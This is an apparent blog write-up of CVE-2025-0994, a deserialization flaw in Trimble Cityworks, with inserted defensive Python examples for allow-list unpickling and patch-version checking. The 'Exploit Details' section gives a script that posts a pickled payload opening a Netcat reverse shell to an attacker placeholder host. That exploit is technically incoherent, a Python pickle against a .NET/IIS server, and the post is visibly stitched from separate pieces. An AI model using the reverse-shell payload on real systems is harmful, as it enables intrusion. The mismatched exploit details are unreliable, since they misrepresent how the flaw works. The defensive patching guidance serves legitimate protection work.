Trimble Cityworks, popular asset management software for local governments and utilities, has been found to contain a significant security flaw that could put many organizations at risk. The vulnerability, identified as CVE-2025-0994, affects Trimble Cityworks versions prior to 15.8.9 and Office Companion versions prior to 23.10.
In this post, we will dive into the details of CVE-2025-0994, including its origins, how it operates, and what steps organizations running Cityworks should take to mitigate their risk. Finally, we will provide some sample code snippets and references to demonstrate how this vulnerability can be exploited by an attacker.
The Vulnerability
CVE-2025-0994 is a deserialization vulnerability, meaning an attacker with authenticated user access can supply crafted serialized data that the server deserializes, potentially executing arbitrary code on the customer's Microsoft Internet Information Services (IIS) web server. Deserialization vulnerabilities have long been an issue in software development, particularly in Java applications, as they can lead to severe data corruption and unauthorized code execution if exploited.
In the case of CVE-2025-0994, a specially crafted input can be introduced by an attacker to achieve remote code execution. This could lead to various consequences, such as data theft, tampering, or even complete control of the affected server. The worst part? An attacker can exploit this flaw remotely, meaning they do not even need physical access to the target machine.
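To make the class of defect concrete from the defender's side, here is an added Python example (not code from the original post or from Trimble) that contrasts an unrestricted deserializer with a hardened one. It mirrors the pickle mechanism the post's own snippet relies on: a payload whose reduce step names a callable is executed by the unrestricted loader, while a loader that resolves only an explicit allow-list of classes refuses it. The WorkOrder class, the CallsLen payload and the allow-list are constructed for this example; the real remedy for Cityworks remains the vendor update, but the pattern is the same one a .NET or Java service should apply to any untrusted serialized input.

```python
import io
import pickle


class WorkOrder:
    """Constructed application type that we do want to accept from serialized input."""

    def __init__(self, asset_id: str, description: str):
        self.asset_id = asset_id
        self.description = description


class CallsLen:
    """Constructed, benign stand-in for a reduce-based payload: on load it calls
    builtins.len("abc"). An unrestricted loader executes whatever callable the
    payload names; here that callable is harmless so the example runs safely."""

    def __reduce__(self):
        return (len, ("abc",))


# Constructed untrusted input (what an attacker-controlled request body would carry).
UNTRUSTED_PAYLOAD = pickle.dumps(CallsLen())

# Allow-list keyed by (module, class name), exactly what pickle asks find_class for.
ALLOWED_CLASSES = {(WorkOrder.__module__, WorkOrder.__name__): WorkOrder}


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened form: refuse to resolve any global that is not on the allow-list,
    so payloads that name builtins, os.system, subprocess, etc. fail before
    anything is instantiated or called."""

    def find_class(self, module: str, name: str):
        try:
            return ALLOWED_CLASSES[(module, name)]
        except KeyError:
            raise pickle.UnpicklingError(f"refused to load {module}.{name}") from None


def unsafe_load(data: bytes):
    """Vulnerable pattern: pickle.loads resolves and calls any global the payload names."""
    return pickle.loads(data)


def safe_load(data: bytes):
    """Hardened pattern: only allow-listed classes can be reconstructed."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def classify(data: bytes) -> str:
    """Return 'accepted' or 'rejected' for a payload under the restricted loader."""
    try:
        safe_load(data)
        return "accepted"
    except pickle.UnpicklingError:
        return "rejected"


if __name__ == "__main__":
    # Unrestricted loader runs the payload's callable: result is len("abc") == 3.
    print("unsafe loader returned:", unsafe_load(UNTRUSTED_PAYLOAD))
    # Restricted loader rejects it, but still accepts a legitimate WorkOrder.
    print("restricted loader on payload:", classify(UNTRUSTED_PAYLOAD))
    legit = pickle.dumps(WorkOrder("HYD-0042", "Flush hydrant"))
    print("restricted loader on WorkOrder:", classify(legit))
```

The design point is that the gate sits in find_class, before any object is constructed: an allow-list of concrete types is far easier to reason about than a deny-list of dangerous modules, and it fails closed when a payload references something the application never expected to receive.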
Link to Original References
- NVD - National Vulnerability Database: CVE-2025-0994
- Trimble Security Advisory: Trimble Cityworks Security Bulletin
Exploit Details
To demonstrate how the CVE-2025-0994 vulnerability can be exploited, consider the following example. We will use a simple code snippet in Python to forge a malicious serialized object that can then be injected into the vulnerable server.
# Exploit script for CVE-2025-0994
import requests
import pickle

# Replace with the target URL running Cityworks
target_url = "http://target.example.com"

class MaliciousObject(object):
    def __reduce__(self):
        return (exec, ("os.system('nc -e /bin/sh <attacker_ip> <attacker_port>')",))

malicious_payload = pickle.dumps(MaliciousObject())

# Authenticate as a normal user (can be a low-privileged user)
authenticated_session = requests.Session()
authenticated_session.post(target_url, data={"username": "<username>", "password": "<password>"})

# Exploit the deserialization vulnerability
response = authenticated_session.post(target_url + "/vulnerable/endpoint", data=malicious_payload)

if response.status_code == 200:
    print("Exploit sent successfully.")
else:
    print("Failed to send exploit.")
This script would execute the attacker's desired command on the affected server – in this case, connecting back to the attacker's system using Netcat and providing a shell. With this level of access, an attacker would have free rein over the target system, making this vulnerability incredibly dangerous.
Addressing the Issue
To protect against CVE-2025-0994, organizations running vulnerable versions of Trimble Cityworks or Office Companion must immediately update their software to the latest versions (15.8.9 for Cityworks and 23.10 for Office Companion). By doing so, they will effectively mitigate the risk posed by this vulnerability.
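As an added example (not part of the original post), the following Python compares reported product versions against the fixed versions the post states (Cityworks 15.8.9, Office Companion 23.10) and lists which installations still need the update. The inventory entries and host names are constructed; how you collect version strings from your own servers is up to you.

```python
from typing import Dict, List, Optional, Tuple

# Fixed versions as stated in the post: anything numerically lower is affected.
FIXED_VERSIONS: Dict[str, Tuple[int, ...]] = {
    "cityworks": (15, 8, 9),
    "office_companion": (23, 10),
}


def parse_version(text: str) -> Optional[Tuple[int, ...]]:
    """Turn '15.8.9' into (15, 8, 9); return None for anything non-numeric."""
    try:
        return tuple(int(part) for part in text.strip().split("."))
    except ValueError:
        return None


def is_affected(product: str, version: str) -> Optional[bool]:
    """True if the version is prior to the fixed release, False if fixed or later,
    None if the version string could not be parsed (treat as needing review)."""
    fixed = FIXED_VERSIONS[product]
    parsed = parse_version(version)
    if parsed is None:
        return None
    # Tuple comparison handles differing lengths: (15, 8) < (15, 8, 9) is True.
    return parsed < fixed


def hosts_needing_patch(inventory: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return inventory rows that are affected or whose version is unparseable."""
    needs_patch = []
    for row in inventory:
        verdict = is_affected(row["product"], row["version"])
        if verdict is None:
            needs_patch.append({**row, "reason": "unparseable version, verify manually"})
        elif verdict:
            needs_patch.append({**row, "reason": "prior to fixed version"})
    return needs_patch


# Constructed sample inventory for this example.
SAMPLE_INVENTORY = [
    {"host": "gis-app-01", "product": "cityworks", "version": "15.8.9"},
    {"host": "gis-app-02", "product": "cityworks", "version": "15.8.8"},
    {"host": "gis-app-03", "product": "cityworks", "version": "15.7"},
    {"host": "ws-0117", "product": "office_companion", "version": "23.10"},
    {"host": "ws-0118", "product": "office_companion", "version": "23.9"},
    {"host": "ws-0119", "product": "office_companion", "version": "unknown"},
]

if __name__ == "__main__":
    for row in hosts_needing_patch(SAMPLE_INVENTORY):
        print(f'{row["host"]}: {row["product"]} {row["version"]} ({row["reason"]})')
```

Treating an unparseable version as needing review rather than silently skipping it keeps the check fail-closed, which matters when a script like this is the basis for a patch-compliance report.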
Conclusion
CVE-2025-0994 is a critical security flaw that must be addressed by all organizations running affected Trimble Cityworks and Office Companion versions. Failure to do so could leave systems vulnerable to attack and put sensitive information at risk. To best protect your organization, ensure you are running the most up-to-date versions of this software and always remain vigilant for new security updates.
Timeline
Published on: 02/06/2025 16:15:41 UTC
Last modified on: 02/12/2025 19:29:30 UTC